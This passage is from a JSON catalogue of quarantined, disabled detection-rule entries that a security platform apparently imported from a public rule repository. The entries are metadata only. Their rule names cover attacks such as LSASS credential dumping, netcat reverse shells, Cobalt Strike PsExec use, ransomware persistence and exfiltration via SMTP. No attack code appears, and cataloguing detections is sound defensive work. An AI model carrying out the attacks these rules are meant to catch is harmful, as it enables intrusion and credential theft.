"chronicle-detection-rules-onelogin-multiple-users-assumed", "type": "detection", "name": "onelogin_multiple_users_assumed", "description": "onelogin_multiple_users_assumed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-multiple-users-assumed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_multiple_users_assumed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_multiple_users_assumed.yaral" } }, { "id": "chronicle-detection-rules-onelogin-multiple-users-login-failures-from-the-same-ip", "type": "detection", "name": "onelogin_multiple_users_login_failures_from_the_same_ip", "description": "onelogin_multiple_users_login_failures_from_the_same_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-multiple-users-login-failures-from-the-same-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_multiple_users_login_failures_from_the_same_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_multiple_users_login_failures_from_the_same_ip.yaral" } }, { "id": "chronicle-detection-rules-onelogin-otp-brute-force-attack", "type": "detection", "name": "onelogin_otp_brute_force_attack", "description": "onelogin_otp_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-otp-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_otp_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_otp_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-onelogin-super-user-privileges-assigned", "type": "detection", "name": "onelogin_super_user_privileges_assigned", "description": "onelogin_super_user_privileges_assigned", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-super-user-privileges-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"onelogin_super_user_privileges_assigned", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_super_user_privileges_assigned.yaral" } }, { "id": "chronicle-detection-rules-onelogin-user-authentication-factor-removed", "type": "detection", "name": "onelogin_user_authentication_factor_removed", "description": "onelogin_user_authentication_factor_removed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-user-authentication-factor-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_user_authentication_factor_removed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_user_authentication_factor_removed.yaral" } }, { "id": "chronicle-detection-rules-onelogin-user-logins-from-multiple-countries", "type": "detection", "name": "onelogin_user_logins_from_multiple_countries", "description": "onelogin_user_logins_from_multiple_countries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-user-logins-from-multiple-countries.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_user_logins_from_multiple_countries", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_user_logins_from_multiple_countries.yaral" } }, { "id": "chronicle-detection-rules-oracle-weblogic-exploit", "type": "detection", "name": "oracle_weblogic_exploit", "description": "oracle_weblogic_exploit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oracle-weblogic-exploit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oracle_weblogic_exploit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/oracle_weblogic_exploit.yaral" } }, { "id": "chronicle-detection-rules-password-dumper-activity-on-lsass", "type": "detection", "name": "password_dumper_activity_on_lsass", "description": "password_dumper_activity_on_lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/password-dumper-activity-on-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "password_dumper_activity_on_lsass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/password_dumper_activity_on_lsass.yaral" } }, { "id": "chronicle-detection-rules-password-dumper-remote-thread-in-lsass", "type": "detection", "name": "password_dumper_remote_thread_in_lsass", "description": "password_dumper_remote_thread_in_lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/password-dumper-remote-thread-in-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "password_dumper_remote_thread_in_lsass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/password_dumper_remote_thread_in_lsass.yaral" } }, { "id": "chronicle-detection-rules-password-stealer-pwdfetcher-detector-sysmon", "type": "detection", "name": "password_stealer_pwdfetcher_detector_sysmon", "description": "password_stealer_pwdfetcher_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/password-stealer-pwdfetcher-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "password_stealer_pwdfetcher_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/password_stealer__pwdfetcher__detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-pax-dism-wim-mount-via-cmdline", "type": "detection", "name": "pax_dism_wim_mount_via_cmdline", "description": "pax_dism_wim_mount_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pax-dism-wim-mount-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pax_dism_wim_mount_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/pax_dism_wim_mount__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-paymen45-ransomware", "type": "detection", "name": "paymen45_ransomware", "description": "paymen45_ransomware", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/paymen45-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "paymen45_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/paymen45_ransomware.yaral" } }, { "id": "chronicle-detection-rules-persistence-of-ryuk-ransomware", "type": "detection", "name": "persistence_of_ryuk_ransomware", "description": "persistence_of_ryuk_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/persistence-of-ryuk-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "persistence_of_ryuk_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/persistence_of_ryuk_ransomware.yaral" } }, { "id": "chronicle-detection-rules-phishing-campaign-using-zoom-invites", "type": "detection", "name": 
"phishing_campaign_using_zoom_invites", "description": "phishing_campaign_using_zoom_invites", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/phishing-campaign-using-zoom-invites.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "phishing_campaign_using_zoom_invites", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/phishing_campaign_using_zoom_invites.yaral" } }, { "id": "chronicle-detection-rules-phorpiex-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "phorpiex_malware_detector_sysmon_behavior_august_2019", "description": "phorpiex_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/phorpiex-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "phorpiex_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": 
"2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/phorpiex_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "chronicle-detection-rules-poetrat-pythonrat-uses-covid19-lure", "type": "detection", "name": "poetrat_pythonrat_uses_covid19_lure", "description": "poetrat_pythonrat_uses_covid19_lure", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/poetrat-pythonrat-uses-covid19-lure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "poetrat_pythonrat_uses_covid19_lure", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/poetrat;_pythonrat_uses_covid_19_lure.yaral" } }, { "id": "chronicle-detection-rules-pony-malware-sysmon", "type": "detection", "name": "pony_malware_sysmon", "description": "pony_malware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pony-malware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pony_malware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", 
"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/pony_malware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-port-proxy-forwarding-t1090-cisa-report", "type": "detection", "name": "port_proxy_forwarding_T1090_cisa_report", "description": "port_proxy_forwarding_T1090_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/port-proxy-forwarding-t1090-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "port_proxy_forwarding_T1090_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/port_proxy_forwarding_T1090_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-possible-abusing-ads", "type": "detection", "name": "possible_abusing_ads", "description": "possible_abusing_ads", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-abusing-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_abusing_ads", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/microsoft_sysmon/possible_abusing_ads.yaral" } }, { "id": "chronicle-detection-rules-possible-anything-cpl-or-anything-dll-hijack-via-imageload", "type": "detection", "name": "possible_anything_cpl_or_anything_dll_hijack__via_imageload", "description": "possible_anything_cpl_or_anything_dll_hijack__via_imageload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-anything-cpl-or-anything-dll-hijack-via-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_anything_cpl_or_anything_dll_hijack__via_imageload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/image_load/possible_anything_cpl_or_anything_dll_hijack__via_imageload.yaral" } }, { "id": "chronicle-detection-rules-possible-applocker-bypass", "type": "detection", "name": "possible_applocker_bypass", "description": "possible_applocker_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/possible-applocker-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_applocker_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_applocker_bypass.yaral" } }, { "id": "chronicle-detection-rules-possible-bind-or-reverse-shell-via-netcat-auditbeat-for-linux", "type": "detection", "name": "possible_bind_or_reverse_shell_via_netcat_auditbeat_for_linux", "description": "possible_bind_or_reverse_shell_via_netcat_auditbeat_for_linux", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-bind-or-reverse-shell-via-netcat-auditbeat-for-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_bind_or_reverse_shell_via_netcat_auditbeat_for_linux", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/linux/possible_bind_or_reverse_shell_via_netcat__auditbeat_for_linux.yaral" } }, { "id": "chronicle-detection-rules-possible-cc-traffic-from-malware-variants", "type": "detection", "name": "possible_cc_traffic_from_malware_variants", "description": 
"possible_cc_traffic_from_malware_variants", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-cc-traffic-from-malware-variants.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_cc_traffic_from_malware_variants", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/possible_c_c_traffic_from_malware_variants.yaral" } }, { "id": "chronicle-detection-rules-possible-cobaltstrike-psexec-filenames-via-audit", "type": "detection", "name": "possible_cobaltstrike_psexec_filenames_via_audit", "description": "possible_cobaltstrike_psexec_filenames_via_audit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-cobaltstrike-psexec-filenames-via-audit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_cobaltstrike_psexec_filenames_via_audit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/security/possible_cobaltstrike_psexec_filenames__via_audit_part_1.yaral" } }, { "id": "chronicle-detection-rules-possible-cobaltstrike-psexec-filenames-via-audit-part-1", "type": "detection", "name": "possible_cobaltstrike_psexec_filenames_via_audit_part_1", "description": "possible_cobaltstrike_psexec_filenames_via_audit_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-cobaltstrike-psexec-filenames-via-audit-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_cobaltstrike_psexec_filenames_via_audit_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/possible_cobaltstrike_psexec_filenames__via_audit_part_2.yaral" } }, { "id": "chronicle-detection-rules-possible-credential-in-files-execution-sysmon-behavior", "type": "detection", "name": "possible_credential_in_files_execution_sysmon_behavior", "description": "possible_credential_in_files_execution_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-credential-in-files-execution-sysmon-behavior.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_credential_in_files_execution_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_credential_in_files_execution__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-possible-data-exfiltration-via-smtp", "type": "detection", "name": "possible_data_exfiltration_via_smtp", "description": "possible_data_exfiltration_via_smtp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-data-exfiltration-via-smtp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_data_exfiltration_via_smtp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_data_exfiltration_via_smtp.yaral" } }, { "id": "chronicle-detection-rules-possible-execution-from-volume-shadow-copy", "type": "detection", "name": "possible_execution_from_volume_shadow_copy", "description": "possible_execution_from_volume_shadow_copy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-execution-from-volume-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_execution_from_volume_shadow_copy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_execution_from_volume_shadow_copy.yaral" } }, { "id": "chronicle-detection-rules-possible-f5-bigip-tmui-attack-cve20205902", "type": "detection", "name": "possible_f5_bigip_tmui_attack_cve20205902", "description": "possible_f5_bigip_tmui_attack_cve20205902", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-f5-bigip-tmui-attack-cve20205902.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_f5_bigip_tmui_attack_cve20205902", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_1.yaral" } }, { "id": "chronicle-detection-rules-possible-f5-bigip-tmui-attack-cve20205902-part-1", "type": "detection", "name": "possible_f5_bigip_tmui_attack_cve20205902_part_1", 
"description": "possible_f5_bigip_tmui_attack_cve20205902_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-f5-bigip-tmui-attack-cve20205902-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_f5_bigip_tmui_attack_cve20205902_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_2.yaral" } }, { "id": "chronicle-detection-rules-possible-flash-0day-execute-embedded-in-word-document-sysmon", "type": "detection", "name": "possible_flash_0day_execute_embedded_in_word_document_sysmon", "description": "possible_flash_0day_execute_embedded_in_word_document_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-flash-0day-execute-embedded-in-word-document-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_flash_0day_execute_embedded_in_word_document_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/possible_flash_0day_execute_embedded_in_word_document___sysmon.yaral" } }, { "id": "chronicle-detection-rules-possible-hpcustpartuidll-hijack-via-imageload", "type": "detection", "name": "possible_hpcustpartuidll_hijack_via_imageload", "description": "possible_hpcustpartuidll_hijack_via_imageload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-hpcustpartuidll-hijack-via-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_hpcustpartuidll_hijack_via_imageload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/image_load/possible_hpcustpartui_dll_hijack__via_imageload.yaral" } }, { "id": 